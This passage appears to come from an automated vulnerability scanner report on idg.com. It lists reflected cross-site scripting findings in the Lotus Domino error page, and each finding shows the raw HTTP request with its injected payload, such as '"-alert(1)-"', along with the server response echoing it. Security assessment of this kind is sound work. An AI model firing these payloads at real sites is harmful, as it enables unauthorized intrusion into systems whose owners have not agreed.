User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:37 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5038
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/public_smo_scripts.js?f4ca8"-alert(1)-"85e454a4e95=1");
} catch(err) {}</script>
...[SNIP]...

2.217. http://idg.com/www/homenew.nsf/request.js [OpenJavascriptLibrary parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/request.js

Issue detail

The value of the OpenJavascriptLibrary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfaa1"-alert(1)-"205fabb7143 was submitted in the OpenJavascriptLibrary parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/request.js?OpenJavascriptLibrarybfaa1"-alert(1)-"205fabb7143 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:27 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5046
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/request.js?OpenJavascriptLibrarybfaa1"-alert(1)-"205fabb7143");
} catch(err) {}</script>
...[SNIP]...

2.218. http://idg.com/www/homenew.nsf/request.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/request.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4ce5"%3b380f1fa090 was submitted in the REST URL parameter 1. This input was echoed as f4ce5";380f1fa090 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwf4ce5"%3b380f1fa090/homenew.nsf/request.js?OpenJavascriptLibrary HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:27 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5035
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwf4ce5";380f1fa090/homenew.nsf/request.js?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

2.219. http://idg.com/www/homenew.nsf/request.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/request.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88126"%3bbb2e45fb221 was submitted in the REST URL parameter 3. This input was echoed as 88126";bb2e45fb221 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/request.js88126"%3bbb2e45fb221?OpenJavascriptLibrary HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:28 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5036
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/request.js88126";bb2e45fb221?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

2.220. http://idg.com/www/homenew.nsf/request.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/request.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9da4"-alert(1)-"4abb3a2a387 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/request.js?a9da4"-alert(1)-"4abb3a2a387=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:36 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5027
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/request.js?a9da4"-alert(1)-"4abb3a2a387=1");
} catch(err) {}</script>
...[SNIP]...

2.221. http://idg.com/www/homenew.nsf/screen2.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/screen2.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2b5c"%3b82c384e1acd was submitted in the REST URL parameter 1. This input was echoed as a2b5c";82c384e1acd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwa2b5c"%3b82c384e1acd/homenew.nsf/screen2.css HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:26 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5015
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwa2b5c";82c384e1acd/homenew.nsf/screen2.css");
} catch(err) {}</script>
...[SNIP]...

2.222. http://idg.com/www/homenew.nsf/screen2.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/screen2.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4760c"%3b8023bed7ea3 was submitted in the REST URL parameter 3. This input was echoed as 4760c";8023bed7ea3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/screen2.css4760c"%3b8023bed7ea3 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:27 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5015
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/screen2.css4760c";8023bed7ea3");
} catch(err) {}</script>
...[SNIP]...

2.223. http://idg.com/www/homenew.nsf/screen2.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/screen2.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2632b"-alert(1)-"260996669dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/screen2.css?2632b"-alert(1)-"260996669dd=1 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:26 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5028
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/screen2.css?2632b"-alert(1)-"260996669dd=1");
} catch(err) {}</script>
...[SNIP]...

2.224. http://idg.com/www/homenew.nsf/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc914"%3bfa7c65a210d was submitted in the REST URL parameter 1. This input was echoed as fc914";fa7c65a210d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwfc914"%3bfa7c65a210d/homenew.nsf/style.css HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:27 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5013
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwfc914";fa7c65a210d/homenew.nsf/style.css");
} catch(err) {}</script>
...[SNIP]...

2.225. http://idg.com/www/homenew.nsf/style.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/style.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9916"%3b0b3e1cac903 was submitted in the REST URL parameter 3. This input was echoed as f9916";0b3e1cac903 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/style.cssf9916"%3b0b3e1cac903 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:28 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5013
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/style.cssf9916";0b3e1cac903");
} catch(err) {}</script>
...[SNIP]...

2.226. http://idg.com/www/homenew.nsf/style.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/style.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65115"-alert(1)-"7b51d567050 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/style.css?65115"-alert(1)-"7b51d567050=1 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:27 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5026
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/style.css?65115"-alert(1)-"7b51d567050=1");
} catch(err) {}</script>
...[SNIP]...

2.227. http://idg.com/www/homenew.nsf/swfobject.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/swfobject.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65557"%3b483e735cb63 was submitted in the REST URL parameter 1. This input was echoed as 65557";483e735cb63 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www65557"%3b483e735cb63/homenew.nsf/swfobject.js HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:38 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5016
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www65557";483e735cb63/homenew.nsf/swfobject.js");
} catch(err) {}</script>
...[SNIP]...

2.228. http://idg.com/www/homenew.nsf/swfobject.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/swfobject.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f344"%3b7bb8563c282 was submitted in the REST URL parameter 3. This input was echoed as 2f344";7bb8563c282 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/swfobject.js2f344"%3b7bb8563c282 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:38 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5016
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/swfobject.js2f344";7bb8563c282");
} catch(err) {}</script>
...[SNIP]...

2.229. http://idg.com/www/homenew.nsf/swfobject.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/swfobject.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0de4"-alert(1)-"fcc60ddb84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/swfobject.js?a0de4"-alert(1)-"fcc60ddb84=1 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:37 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5028
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/swfobject.js?a0de4"-alert(1)-"fcc60ddb84=1");
} catch(err) {}</script>
...[SNIP]...

2.230. http://idg.com/www/homenew.nsf/tabs.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/tabs.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d84b"%3bec78c03d4d3 was submitted in the REST URL parameter 1. This input was echoed as 2d84b";ec78c03d4d3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www2d84b"%3bec78c03d4d3/homenew.nsf/tabs.css HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
